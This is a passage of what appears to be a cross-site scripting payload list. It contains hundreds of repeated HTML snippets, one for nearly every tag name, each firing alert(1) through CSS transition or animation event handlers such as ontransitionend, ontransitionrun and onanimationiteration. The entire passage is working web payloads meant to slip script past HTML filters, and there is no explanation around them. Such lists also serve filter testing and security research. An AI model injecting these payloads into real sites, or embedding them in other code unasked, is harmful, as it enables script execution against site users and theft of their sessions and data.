style="transition:color 1s" ontransitionend=alert(1)></isindex> <style>:target {color:red;}</style><kbd id=x style="transition:color 1s" ontransitionend=alert(1)></kbd> <style>:target {color:red;}</style><keygen id=x style="transition:color 1s" ontransitionend=alert(1)></keygen> <style>:target {color:red;}</style><label id=x style="transition:color 1s" ontransitionend=alert(1)></label> <style>:target {color:red;}</style><legend id=x style="transition:color 1s" ontransitionend=alert(1)></legend> <style>:target {color:red;}</style><li id=x style="transition:color 1s" ontransitionend=alert(1)></li> <style>:target {color:red;}</style><link id=x style="transition:color 1s" ontransitionend=alert(1)></link> <style>:target {color:red;}</style><listing id=x style="transition:color 1s" ontransitionend=alert(1)></listing> <style>:target {color:red;}</style><main id=x style="transition:color 1s" ontransitionend=alert(1)></main> <style>:target {color:red;}</style><map id=x style="transition:color 1s" ontransitionend=alert(1)></map> <style>:target {color:red;}</style><mark id=x style="transition:color 1s" ontransitionend=alert(1)></mark> <style>:target {color:red;}</style><marquee id=x style="transition:color 1s" ontransitionend=alert(1)></marquee> <style>:target {color:red;}</style><menu id=x style="transition:color 1s" ontransitionend=alert(1)></menu> <style>:target {color:red;}</style><menuitem id=x style="transition:color 1s" ontransitionend=alert(1)></menuitem> <style>:target {color:red;}</style><meta id=x style="transition:color 1s" ontransitionend=alert(1)></meta> <style>:target {color:red;}</style><meter id=x style="transition:color 1s" ontransitionend=alert(1)></meter> <style>:target {color:red;}</style><multicol id=x style="transition:color 1s" ontransitionend=alert(1)></multicol> <style>:target {color:red;}</style><nav id=x style="transition:color 1s" ontransitionend=alert(1)></nav> <style>:target {color:red;}</style><nextid id=x style="transition:color 1s" ontransitionend=alert(1)></nextid> <style>:target {color:red;}</style><nobr id=x style="transition:color 1s" ontransitionend=alert(1)></nobr> <style>:target {color:red;}</style><noembed id=x style="transition:color 1s" ontransitionend=alert(1)></noembed> <style>:target {color:red;}</style><noframes id=x style="transition:color 1s" ontransitionend=alert(1)></noframes> <style>:target {color:red;}</style><noscript id=x style="transition:color 1s" ontransitionend=alert(1)></noscript> <style>:target {color:red;}</style><object id=x style="transition:color 1s" ontransitionend=alert(1)></object> <style>:target {color:red;}</style><ol id=x style="transition:color 1s" ontransitionend=alert(1)></ol> <style>:target {color:red;}</style><optgroup id=x style="transition:color 1s" ontransitionend=alert(1)></optgroup> <style>:target {color:red;}</style><option id=x style="transition:color 1s" ontransitionend=alert(1)></option> <style>:target {color:red;}</style><output id=x style="transition:color 1s" ontransitionend=alert(1)></output> <style>:target {color:red;}</style><p id=x style="transition:color 1s" ontransitionend=alert(1)></p> <style>:target {color:red;}</style><param id=x style="transition:color 1s" ontransitionend=alert(1)></param> <style>:target {color:red;}</style><picture id=x style="transition:color 1s" ontransitionend=alert(1)></picture> <style>:target {color:red;}</style><plaintext id=x style="transition:color 1s" ontransitionend=alert(1)></plaintext> <style>:target {color:red;}</style><pre id=x style="transition:color 1s" ontransitionend=alert(1)></pre> <style>:target {color:red;}</style><progress id=x style="transition:color 1s" ontransitionend=alert(1)></progress> <style>:target {color:red;}</style><q id=x style="transition:color 1s" ontransitionend=alert(1)></q> <style>:target {color:red;}</style><rb id=x style="transition:color 1s" ontransitionend=alert(1)></rb> <style>:target {color:red;}</style><rp id=x style="transition:color 1s" ontransitionend=alert(1)></rp> <style>:target {color:red;}</style><rt id=x style="transition:color 1s" ontransitionend=alert(1)></rt> <style>:target {color:red;}</style><rtc id=x style="transition:color 1s" ontransitionend=alert(1)></rtc> <style>:target {color:red;}</style><ruby id=x style="transition:color 1s" ontransitionend=alert(1)></ruby> <style>:target {color:red;}</style><s id=x style="transition:color 1s" ontransitionend=alert(1)></s> <style>:target {color:red;}</style><samp id=x style="transition:color 1s" ontransitionend=alert(1)></samp> <style>:target {color:red;}</style><script id=x style="transition:color 1s" ontransitionend=alert(1)></script> <style>:target {color:red;}</style><section id=x style="transition:color 1s" ontransitionend=alert(1)></section> <style>:target {color:red;}</style><select id=x style="transition:color 1s" ontransitionend=alert(1)></select> <style>:target {color:red;}</style><shadow id=x style="transition:color 1s" ontransitionend=alert(1)></shadow> <style>:target {color:red;}</style><slot id=x style="transition:color 1s" ontransitionend=alert(1)></slot> <style>:target {color:red;}</style><small id=x style="transition:color 1s" ontransitionend=alert(1)></small> <style>:target {color:red;}</style><source id=x style="transition:color 1s" ontransitionend=alert(1)></source> <style>:target {color:red;}</style><spacer id=x style="transition:color 1s" ontransitionend=alert(1)></spacer> <style>:target {color:red;}</style><span id=x style="transition:color 1s" ontransitionend=alert(1)></span> <style>:target {color:red;}</style><strike id=x style="transition:color 1s" ontransitionend=alert(1)></strike> <style>:target {color:red;}</style><strong id=x style="transition:color 1s" ontransitionend=alert(1)></strong> <style>:target {color:red;}</style><style id=x style="transition:color 1s" ontransitionend=alert(1)></style> <style>:target {color:red;}</style><sub id=x style="transition:color 1s" ontransitionend=alert(1)></sub> <style>:target {color:red;}</style><summary id=x style="transition:color 1s" ontransitionend=alert(1)></summary> <style>:target {color:red;}</style><sup id=x style="transition:color 1s" ontransitionend=alert(1)></sup> <style>:target {color:red;}</style><svg id=x style="transition:color 1s" ontransitionend=alert(1)></svg> <style>:target {color:red;}</style><table id=x style="transition:color 1s" ontransitionend=alert(1)></table> <style>:target {color:red;}</style><tbody id=x style="transition:color 1s" ontransitionend=alert(1)></tbody> <style>:target {color:red;}</style><td id=x style="transition:color 1s" ontransitionend=alert(1)></td> <style>:target {color:red;}</style><template id=x style="transition:color 1s" ontransitionend=alert(1)></template> <style>:target {color:red;}</style><textarea id=x style="transition:color 1s" ontransitionend=alert(1)></textarea> <style>:target {color:red;}</style><tfoot id=x style="transition:color 1s" ontransitionend=alert(1)></tfoot> <style>:target {color:red;}</style><th id=x style="transition:color 1s" ontransitionend=alert(1)></th> <style>:target {color:red;}</style><thead id=x style="transition:color 1s" ontransitionend=alert(1)></thead> <style>:target {color:red;}</style><time id=x style="transition:color 1s" ontransitionend=alert(1)></time> <style>:target {color:red;}</style><title id=x style="transition:color 1s" ontransitionend=alert(1)></title> <style>:target {color:red;}</style><tr id=x style="transition:color 1s" ontransitionend=alert(1)></tr> <style>:target {color:red;}</style><track id=x style="transition:color 1s" ontransitionend=alert(1)></track> <style>:target {color:red;}</style><tt id=x style="transition:color 1s" ontransitionend=alert(1)></tt> <style>:target {color:red;}</style><u id=x style="transition:color 1s" ontransitionend=alert(1)></u> <style>:target {color:red;}</style><ul id=x style="transition:color 1s" ontransitionend=alert(1)></ul> <style>:target {color:red;}</style><var id=x style="transition:color 1s" ontransitionend=alert(1)></var> <style>:target {color:red;}</style><video id=x style="transition:color 1s" ontransitionend=alert(1)></video> <style>:target {color:red;}</style><wbr id=x style="transition:color 1s" ontransitionend=alert(1)></wbr> <style>:target {color:red;}</style><xmp id=x style="transition:color 1s" ontransitionend=alert(1)></xmp> <style>:target {transform: rotate(180deg);}</style><a id=x style="transition:transform 2s" ontransitionrun=alert(1)></a> <style>:target {transform: rotate(180deg);}</style><abbr id=x style="transition:transform 2s" ontransitionrun=alert(1)></abbr> <style>:target {transform: rotate(180deg);}</style><acronym id=x style="transition:transform 2s" ontransitionrun=alert(1)></acronym> <style>:target {transform: rotate(180deg);}</style><address id=x style="transition:transform 2s" ontransitionrun=alert(1)></address> <style>:target {transform: rotate(180deg);}</style><applet id=x style="transition:transform 2s" ontransitionrun=alert(1)></applet> <style>:target {transform: rotate(180deg);}</style><area id=x style="transition:transform 2s" ontransitionrun=alert(1)></area> <style>:target {transform: rotate(180deg);}</style><article id=x style="transition:transform 2s" ontransitionrun=alert(1)></article> <style>:target {transform: rotate(180deg);}</style><aside id=x style="transition:transform 2s" ontransitionrun=alert(1)></aside> <style>:target {transform: rotate(180deg);}</style><audio id=x style="transition:transform 2s" ontransitionrun=alert(1)></audio> <style>:target {transform: rotate(180deg);}</style><b id=x style="transition:transform 2s" ontransitionrun=alert(1)></b> <style>:target {transform: rotate(180deg);}</style><base id=x style="transition:transform 2s" ontransitionrun=alert(1)></base> <style>:target {transform: rotate(180deg);}</style><basefont id=x style="transition:transform 2s" ontransitionrun=alert(1)></basefont> <style>:target {transform: rotate(180deg);}</style><bdi id=x style="transition:transform 2s" ontransitionrun=alert(1)></bdi> <style>:target {transform: rotate(180deg);}</style><bdo id=x style="transition:transform 2s" ontransitionrun=alert(1)></bdo> <style>:target {transform: rotate(180deg);}</style><bgsound id=x style="transition:transform 2s" ontransitionrun=alert(1)></bgsound> <style>:target {transform: rotate(180deg);}</style><big id=x style="transition:transform 2s" ontransitionrun=alert(1)></big> <style>:target {transform: rotate(180deg);}</style><blink id=x style="transition:transform 2s" ontransitionrun=alert(1)></blink> <style>:target {transform: rotate(180deg);}</style><blockquote id=x style="transition:transform 2s" ontransitionrun=alert(1)></blockquote> <style>:target {transform: rotate(180deg);}</style><body id=x style="transition:transform 2s" ontransitionrun=alert(1)></body> <style>:target {transform: rotate(180deg);}</style><br id=x style="transition:transform 2s" ontransitionrun=alert(1)></br> <style>:target {transform: rotate(180deg);}</style><button id=x style="transition:transform 2s" ontransitionrun=alert(1)></button> <style>:target {transform: rotate(180deg);}</style><canvas id=x style="transition:transform 2s" ontransitionrun=alert(1)></canvas> <style>:target {transform: rotate(180deg);}</style><caption id=x style="transition:transform 2s" ontransitionrun=alert(1)></caption> <style>:target {transform: rotate(180deg);}</style><center id=x style="transition:transform 2s" ontransitionrun=alert(1)></center> <style>:target {transform: rotate(180deg);}</style><cite id=x style="transition:transform 2s" ontransitionrun=alert(1)></cite> <style>:target {transform: rotate(180deg);}</style><code id=x style="transition:transform 2s" ontransitionrun=alert(1)></code> <style>:target {transform: rotate(180deg);}</style><col id=x style="transition:transform 2s" ontransitionrun=alert(1)></col> <style>:target {transform: rotate(180deg);}</style><colgroup id=x style="transition:transform 2s" ontransitionrun=alert(1)></colgroup> <style>:target {transform: rotate(180deg);}</style><command id=x style="transition:transform 2s" ontransitionrun=alert(1)></command> <style>:target {transform: rotate(180deg);}</style><content id=x style="transition:transform 2s" ontransitionrun=alert(1)></content> <style>:target {transform: rotate(180deg);}</style><data id=x style="transition:transform 2s" ontransitionrun=alert(1)></data> <style>:target {transform: rotate(180deg);}</style><datalist id=x style="transition:transform 2s" ontransitionrun=alert(1)></datalist> <style>:target {transform: rotate(180deg);}</style><dd id=x style="transition:transform 2s" ontransitionrun=alert(1)></dd> <style>:target {transform: rotate(180deg);}</style><del id=x style="transition:transform 2s" ontransitionrun=alert(1)></del> <style>:target {transform: rotate(180deg);}</style><details id=x style="transition:transform 2s" ontransitionrun=alert(1)></details> <style>:target {transform: rotate(180deg);}</style><dfn id=x style="transition:transform 2s" ontransitionrun=alert(1)></dfn> <style>:target {transform: rotate(180deg);}</style><dialog id=x style="transition:transform 2s" ontransitionrun=alert(1)></dialog> <style>:target {transform: rotate(180deg);}</style><dir id=x style="transition:transform 2s" ontransitionrun=alert(1)></dir> <style>:target {transform: rotate(180deg);}</style><div id=x style="transition:transform 2s" ontransitionrun=alert(1)></div> <style>:target {transform: rotate(180deg);}</style><dl id=x style="transition:transform 2s" ontransitionrun=alert(1)></dl> <style>:target {transform: rotate(180deg);}</style><dt id=x style="transition:transform 2s" ontransitionrun=alert(1)></dt> <style>:target {transform: rotate(180deg);}</style><element id=x style="transition:transform 2s" ontransitionrun=alert(1)></element> <style>:target {transform: rotate(180deg);}</style><em id=x style="transition:transform 2s" ontransitionrun=alert(1)></em> <style>:target {transform: rotate(180deg);}</style><embed id=x style="transition:transform 2s" ontransitionrun=alert(1)></embed> <style>:target {transform: rotate(180deg);}</style><fieldset id=x style="transition:transform 2s" ontransitionrun=alert(1)></fieldset> <style>:target {transform: rotate(180deg);}</style><figcaption id=x style="transition:transform 2s" ontransitionrun=alert(1)></figcaption> <style>:target {transform: rotate(180deg);}</style><figure id=x style="transition:transform 2s" ontransitionrun=alert(1)></figure> <style>:target {transform: rotate(180deg);}</style><font id=x style="transition:transform 2s" ontransitionrun=alert(1)></font> <style>:target {transform: rotate(180deg);}</style><footer id=x style="transition:transform 2s" ontransitionrun=alert(1)></footer> <style>:target {transform: rotate(180deg);}</style><form id=x style="transition:transform 2s" ontransitionrun=alert(1)></form> <style>:target {transform: rotate(180deg);}</style><frame id=x style="transition:transform 2s" ontransitionrun=alert(1)></frame> <style>:target {transform: rotate(180deg);}</style><frameset id=x style="transition:transform 2s" ontransitionrun=alert(1)></frameset> <style>:target {transform: rotate(180deg);}</style><h1 id=x style="transition:transform 2s" ontransitionrun=alert(1)></h1> <style>:target {transform: rotate(180deg);}</style><head id=x style="transition:transform 2s" ontransitionrun=alert(1)></head> <style>:target {transform: rotate(180deg);}</style><header id=x style="transition:transform 2s" ontransitionrun=alert(1)></header> <style>:target {transform: rotate(180deg);}</style><hgroup id=x style="transition:transform 2s" ontransitionrun=alert(1)></hgroup> <style>:target {transform: rotate(180deg);}</style><hr id=x style="transition:transform 2s" ontransitionrun=alert(1)></hr> <style>:target {transform: rotate(180deg);}</style><html id=x style="transition:transform 2s" ontransitionrun=alert(1)></html> <style>:target {transform: rotate(180deg);}</style><i id=x style="transition:transform 2s" ontransitionrun=alert(1)></i> <style>:target {transform: rotate(180deg);}</style><iframe id=x style="transition:transform 2s" ontransitionrun=alert(1)></iframe> <style>:target {transform: rotate(180deg);}</style><image id=x style="transition:transform 2s" ontransitionrun=alert(1)></image> <style>:target {transform: rotate(180deg);}</style><img id=x style="transition:transform 2s" ontransitionrun=alert(1)></img> <style>:target {transform: rotate(180deg);}</style><input id=x style="transition:transform 2s" ontransitionrun=alert(1)></input> <style>:target {transform: rotate(180deg);}</style><ins id=x style="transition:transform 2s" ontransitionrun=alert(1)></ins> <style>:target {transform: rotate(180deg);}</style><isindex id=x style="transition:transform 2s" ontransitionrun=alert(1)></isindex> <style>:target {transform: rotate(180deg);}</style><kbd id=x style="transition:transform 2s" ontransitionrun=alert(1)></kbd> <style>:target {transform: rotate(180deg);}</style><keygen id=x style="transition:transform 2s" ontransitionrun=alert(1)></keygen> <style>:target {transform: rotate(180deg);}</style><label id=x style="transition:transform 2s" ontransitionrun=alert(1)></label> <style>:target {transform: rotate(180deg);}</style><legend id=x style="transition:transform 2s" ontransitionrun=alert(1)></legend> <style>:target {transform: rotate(180deg);}</style><li id=x style="transition:transform 2s" ontransitionrun=alert(1)></li> <style>:target {transform: rotate(180deg);}</style><link id=x style="transition:transform 2s" ontransitionrun=alert(1)></link> <style>:target {transform: rotate(180deg);}</style><listing id=x style="transition:transform 2s" ontransitionrun=alert(1)></listing> <style>:target {transform: rotate(180deg);}</style><main id=x style="transition:transform 2s" ontransitionrun=alert(1)></main> <style>:target {transform: rotate(180deg);}</style><map id=x style="transition:transform 2s" ontransitionrun=alert(1)></map> <style>:target {transform: rotate(180deg);}</style><mark id=x style="transition:transform 2s" ontransitionrun=alert(1)></mark> <style>:target {transform: rotate(180deg);}</style><marquee id=x style="transition:transform 2s" ontransitionrun=alert(1)></marquee> <style>:target {transform: rotate(180deg);}</style><menu id=x style="transition:transform 2s" ontransitionrun=alert(1)></menu> <style>:target {transform: rotate(180deg);}</style><menuitem id=x style="transition:transform 2s" ontransitionrun=alert(1)></menuitem> <style>:target {transform: rotate(180deg);}</style><meta id=x style="transition:transform 2s" ontransitionrun=alert(1)></meta> <style>:target {transform: rotate(180deg);}</style><meter id=x style="transition:transform 2s" ontransitionrun=alert(1)></meter> <style>:target {transform: rotate(180deg);}</style><multicol id=x style="transition:transform 2s" ontransitionrun=alert(1)></multicol> <style>:target {transform: rotate(180deg);}</style><nav id=x style="transition:transform 2s" ontransitionrun=alert(1)></nav> <style>:target {transform: rotate(180deg);}</style><nextid id=x style="transition:transform 2s" ontransitionrun=alert(1)></nextid> <style>:target {transform: rotate(180deg);}</style><nobr id=x style="transition:transform 2s" ontransitionrun=alert(1)></nobr> <style>:target {transform: rotate(180deg);}</style><noembed id=x style="transition:transform 2s" ontransitionrun=alert(1)></noembed> <style>:target {transform: rotate(180deg);}</style><noframes id=x style="transition:transform 2s" ontransitionrun=alert(1)></noframes> <style>:target {transform: rotate(180deg);}</style><noscript id=x style="transition:transform 2s" ontransitionrun=alert(1)></noscript> <style>:target {transform: rotate(180deg);}</style><object id=x style="transition:transform 2s" ontransitionrun=alert(1)></object> <style>:target {transform: rotate(180deg);}</style><ol id=x style="transition:transform 2s" ontransitionrun=alert(1)></ol> <style>:target {transform: rotate(180deg);}</style><optgroup id=x style="transition:transform 2s" ontransitionrun=alert(1)></optgroup> <style>:target {transform: rotate(180deg);}</style><option id=x style="transition:transform 2s" ontransitionrun=alert(1)></option> <style>:target {transform: rotate(180deg);}</style><output id=x style="transition:transform 2s" ontransitionrun=alert(1)></output> <style>:target {transform: rotate(180deg);}</style><p id=x style="transition:transform 2s" ontransitionrun=alert(1)></p> <style>:target {transform: rotate(180deg);}</style><param id=x style="transition:transform 2s" ontransitionrun=alert(1)></param> <style>:target {transform: rotate(180deg);}</style><picture id=x style="transition:transform 2s" ontransitionrun=alert(1)></picture> <style>:target {transform: rotate(180deg);}</style><plaintext id=x style="transition:transform 2s" ontransitionrun=alert(1)></plaintext> <style>:target {transform: rotate(180deg);}</style><pre id=x style="transition:transform 2s" ontransitionrun=alert(1)></pre> <style>:target {transform: rotate(180deg);}</style><progress id=x style="transition:transform 2s" ontransitionrun=alert(1)></progress> <style>:target {transform: rotate(180deg);}</style><q id=x style="transition:transform 2s" ontransitionrun=alert(1)></q> <style>:target {transform: rotate(180deg);}</style><rb id=x style="transition:transform 2s" ontransitionrun=alert(1)></rb> <style>:target {transform: rotate(180deg);}</style><rp id=x style="transition:transform 2s" ontransitionrun=alert(1)></rp> <style>:target {transform: rotate(180deg);}</style><rt id=x style="transition:transform 2s" ontransitionrun=alert(1)></rt> <style>:target {transform: rotate(180deg);}</style><rtc id=x style="transition:transform 2s" ontransitionrun=alert(1)></rtc> <style>:target {transform: rotate(180deg);}</style><ruby id=x style="transition:transform 2s" ontransitionrun=alert(1)></ruby> <style>:target {transform: rotate(180deg);}</style><s id=x style="transition:transform 2s" ontransitionrun=alert(1)></s> <style>:target {transform: rotate(180deg);}</style><samp id=x style="transition:transform 2s" ontransitionrun=alert(1)></samp> <style>:target {transform: rotate(180deg);}</style><script id=x style="transition:transform 2s" ontransitionrun=alert(1)></script> <style>:target {transform: rotate(180deg);}</style><section id=x style="transition:transform 2s" ontransitionrun=alert(1)></section> <style>:target {transform: rotate(180deg);}</style><select id=x style="transition:transform 2s" ontransitionrun=alert(1)></select> <style>:target {transform: rotate(180deg);}</style><shadow id=x style="transition:transform 2s" ontransitionrun=alert(1)></shadow> <style>:target {transform: rotate(180deg);}</style><slot id=x style="transition:transform 2s" ontransitionrun=alert(1)></slot> <style>:target {transform: rotate(180deg);}</style><small id=x style="transition:transform 2s" ontransitionrun=alert(1)></small> <style>:target {transform: rotate(180deg);}</style><source id=x style="transition:transform 2s" ontransitionrun=alert(1)></source> <style>:target {transform: rotate(180deg);}</style><spacer id=x style="transition:transform 2s" ontransitionrun=alert(1)></spacer> <style>:target {transform: rotate(180deg);}</style><span id=x style="transition:transform 2s" ontransitionrun=alert(1)></span> <style>:target {transform: rotate(180deg);}</style><strike id=x style="transition:transform 2s" ontransitionrun=alert(1)></strike> <style>:target {transform: rotate(180deg);}</style><strong id=x style="transition:transform 2s" ontransitionrun=alert(1)></strong> <style>:target {transform: rotate(180deg);}</style><style id=x style="transition:transform 2s" ontransitionrun=alert(1)></style> <style>:target {transform: rotate(180deg);}</style><sub id=x style="transition:transform 2s" ontransitionrun=alert(1)></sub> <style>:target {transform: rotate(180deg);}</style><summary id=x style="transition:transform 2s" ontransitionrun=alert(1)></summary> <style>:target {transform: rotate(180deg);}</style><sup id=x style="transition:transform 2s" ontransitionrun=alert(1)></sup> <style>:target {transform: rotate(180deg);}</style><svg id=x style="transition:transform 2s" ontransitionrun=alert(1)></svg> <style>:target {transform: rotate(180deg);}</style><table id=x style="transition:transform 2s" ontransitionrun=alert(1)></table> <style>:target {transform: rotate(180deg);}</style><tbody id=x style="transition:transform 2s" ontransitionrun=alert(1)></tbody> <style>:target {transform: rotate(180deg);}</style><td id=x style="transition:transform 2s" ontransitionrun=alert(1)></td> <style>:target {transform: rotate(180deg);}</style><template id=x style="transition:transform 2s" ontransitionrun=alert(1)></template> <style>:target {transform: rotate(180deg);}</style><textarea id=x style="transition:transform 2s" ontransitionrun=alert(1)></textarea> <style>:target {transform: rotate(180deg);}</style><tfoot id=x style="transition:transform 2s" ontransitionrun=alert(1)></tfoot> <style>:target {transform: rotate(180deg);}</style><th id=x style="transition:transform 2s" ontransitionrun=alert(1)></th> <style>:target {transform: rotate(180deg);}</style><thead id=x style="transition:transform 2s" ontransitionrun=alert(1)></thead> <style>:target {transform: rotate(180deg);}</style><time id=x style="transition:transform 2s" ontransitionrun=alert(1)></time> <style>:target {transform: rotate(180deg);}</style><title id=x style="transition:transform 2s" ontransitionrun=alert(1)></title> <style>:target {transform: rotate(180deg);}</style><tr id=x style="transition:transform 2s" ontransitionrun=alert(1)></tr> <style>:target {transform: rotate(180deg);}</style><track id=x style="transition:transform 2s" ontransitionrun=alert(1)></track> <style>:target {transform: rotate(180deg);}</style><tt id=x style="transition:transform 2s" ontransitionrun=alert(1)></tt> <style>:target {transform: rotate(180deg);}</style><u id=x style="transition:transform 2s" ontransitionrun=alert(1)></u> <style>:target {transform: rotate(180deg);}</style><ul id=x style="transition:transform 2s" ontransitionrun=alert(1)></ul> <style>:target {transform: rotate(180deg);}</style><var id=x style="transition:transform 2s" ontransitionrun=alert(1)></var> <style>:target {transform: rotate(180deg);}</style><video id=x style="transition:transform 2s" ontransitionrun=alert(1)></video> <style>:target {transform: rotate(180deg);}</style><wbr id=x style="transition:transform 2s" ontransitionrun=alert(1)></wbr> <style>:target {transform: rotate(180deg);}</style><xmp id=x style="transition:transform 2s" ontransitionrun=alert(1)></xmp> <style>:target {transform: rotate(180deg);}</style><xss id=x style="transition:transform 10s" ontransitioncancel=alert(1)></xss> <style>:target {transform: rotate(180deg);}</style><xss id=x style="transition:transform 2s" ontransitionrun=alert(1)></xss> <style>@keyframes slidein {}</style><a style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></a> <style>@keyframes slidein {}</style><abbr style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></abbr> <style>@keyframes slidein {}</style><acronym style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></acronym> <style>@keyframes slidein {}</style><address style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></address> <style>@keyframes slidein {}</style><applet style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></applet> <style>@keyframes slidein {}</style><area style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></area> <style>@keyframes slidein {}</style><article style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></article> <style>@keyframes slidein {}</style><aside style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></aside> <style>@keyframes slidein {}</style><audio style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></audio> <style>@keyframes slidein {}</style><b style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></b> <style>@keyframes slidein {}</style><base style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></base> <style>@keyframes slidein {}</style><basefont style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></basefont> <style>@keyframes slidein {}</style><bdi style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></bdi> <style>@keyframes slidein {}</style><bdo style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></bdo> <style>@keyframes slidein {}</style><bgsound style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></bgsound> <style>@keyframes slidein {}</style><big style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></big> <style>@keyframes slidein {}</style><blink style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></blink> <style>@keyframes slidein {}</style><blockquote style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></blockquote> <style>@keyframes slidein {}</style><body style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></body> <style>@keyframes slidein {}</style><br style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></br> <style>@keyframes slidein {}</style><button style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></button> <style>@keyframes slidein {}</style><canvas style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></canvas> <style>@keyframes slidein {}</style><caption style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></caption> <style>@keyframes slidein {}</style><center style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></center> <style>@keyframes slidein {}</style><cite style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></cite> <style>@keyframes slidein {}</style><code style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></code> <style>@keyframes slidein {}</style><col style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></col> <style>@keyframes slidein {}</style><colgroup style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></colgroup> <style>@keyframes slidein {}</style><command style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></command> <style>@keyframes slidein {}</style><content style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></content> <style>@keyframes slidein {}</style><data style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></data> <style>@keyframes slidein {}</style><datalist style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></datalist> <style>@keyframes slidein {}</style><dd style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></dd> <style>@keyframes slidein {}</style><del style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></del> <style>@keyframes slidein {}</style><details style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></details> <style>@keyframes slidein {}</style><dfn style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></dfn> <style>@keyframes slidein {}</style><dialog style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></dialog> <style>@keyframes slidein {}</style><dir style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></dir> <style>@keyframes slidein {}</style><div style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></div> <style>@keyframes slidein {}</style><dl style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></dl> <style>@keyframes slidein {}</style><dt style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></dt> <style>@keyframes slidein {}</style><element style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></element> <style>@keyframes slidein {}</style><em style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></em> <style>@keyframes slidein {}</style><embed style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></embed> <style>@keyframes slidein {}</style><fieldset style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></fieldset> <style>@keyframes slidein {}</style><figcaption style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></figcaption> <style>@keyframes slidein {}</style><figure style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></figure> <style>@keyframes slidein {}</style><font style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></font> <style>@keyframes slidein {}</style><footer style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></footer> <style>@keyframes slidein {}</style><form style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></form> <style>@keyframes slidein {}</style><frame style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></frame> <style>@keyframes slidein {}</style><frameset style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></frameset> <style>@keyframes slidein {}</style><h1 style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></h1> <style>@keyframes slidein {}</style><head style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></head> <style>@keyframes slidein {}</style><header style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></header> <style>@keyframes slidein {}</style><hgroup style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></hgroup> <style>@keyframes slidein {}</style><hr style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></hr> <style>@keyframes slidein {}</style><html 